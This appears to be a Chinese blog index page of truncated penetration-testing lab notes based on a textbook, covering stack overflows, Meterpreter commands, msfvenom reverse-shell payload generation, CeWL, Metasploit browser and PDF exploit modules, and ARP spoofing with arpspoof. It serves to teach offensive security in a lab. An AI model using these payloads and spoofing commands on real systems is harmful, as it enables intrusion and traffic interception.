Kali
参考书籍:[美]Georgia Weidman的《Penetration Testing》
wwxxee
become better
展开
-
[Kali]--栈缓冲区溢出
栈缓冲区溢出内存数据分布图Text:包含程序代码Data:包含全局变量,静态变量,该段的大小在编译时计算堆:存储动态变量,new动作会在堆上分配内存栈:保存函数参数,局部变量,函数调用时栈空间消耗就会变大。堆栈内存是运行时实时分配的CPU通用寄存器EIP:指令指针ESP:栈指针(栈顶)EBP:基指针(栈底)ESI:源变址寄存器EDI:目标变址寄存器EAX:累加寄存器EBX:基地址寄存器ECX:计数寄存器EDX:数据寄存器与栈溢出有关的寄存器主要是ESP,EBP,E原创 2020-11-24 17:25:27 · 310 阅读 · 0 评论 -
[Kali]--Meterpreter深度渗透
Meterpreter深度渗透通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。Meterpreter会话下:upload:从kali主机上传到靶机upload /usr/share/windows-binarier/nc.exe C:\getuid:查看meterpreter的系统运行权限ps:当前正在运行的进程列表download:从靶机下载文件到本机上systeminfo:execute -f notepad.exe:执行程序,加-H可原创 2020-11-06 17:17:30 · 1009 阅读 · 0 评论 -
[Kali]--Msfvenom
Msfvenom参数MsfVenom - a Metasploit standalone payload generator.Also a replacement for msfpayload and msfencode.Usage: /usr/bin/msfvenom [options] <var=val>Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.ex原创 2020-11-06 17:15:48 · 936 阅读 · 0 评论 -
[Kali]--密码工具
密码工具cewl爬取一个指定的url,返回一个单词列表。一款密码自动化定制工具。CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)Usage: cewl [OPTIONS] … OPTIONS: -h, --help: Show help. -k, --keep: Keep the downloaded file. # 保存下载的文件 -d <x>原创 2020-11-06 17:13:46 · 950 阅读 · 0 评论 -
[kali]--攻击浏览器漏洞
攻击浏览器漏洞Web浏览器时渲染和还原页面信息的应用程序,如果浏览器打开的页面含有触发漏洞的恶意代码,那么我们就有机会控制浏览器的下一步动作,执行payload。Aurora攻击2010年,Aurora攻击利用了一个存在于当时IE浏览器中尚未修复的0day漏洞。环境:实验的winxp靶机上有安装IE浏览器且没有安装Aurora的漏洞更新补丁。kali:192.168.17.129winxp:192.168.17.1301.设置模块我们利用meatasploit的Aurora模块原创 2020-11-06 17:10:10 · 1424 阅读 · 0 评论 -
[Kali]--攻击PDF漏洞
攻击PDF漏洞如果某人使用的PDF软件存在安全漏洞,还打开了恶意PDF文档,那么他的PDF程序就会遭受攻击。windows系统上的PDF程序Adobe Reader自古以来就常常爆出安全漏洞。环境winxp:192.168.17.130 8.1.2版本的Adobe Reader(cve-2008-2992)kali:192.168.17.129模块exploit/windows/fileformat/adobe_utilprintfuse exploit/windows/file原创 2020-11-06 17:07:38 · 1064 阅读 · 0 评论 -
[Kali]--ARP攻击
ARP攻击ARP缓存攻击的原理这里就不说明了,直接开启实验。IP转发在kali上开启IP转发:echo 1 > /proc/sys/net/ipv4/ip_forwardarpspoofarpspoof是一款简单易用的arp缓存攻击工具。在使用时需要指定具体的网络接口,攻击的目标主机以及想要伪装的IP地址。(没有指定目标主机的话会对整个网络进行攻击)arpspoof -i 网卡 -t 目标IP 想要伪装的IPkali:arpspoof -i eth0 -t 19原创 2020-11-06 17:05:23 · 272 阅读 · 1 评论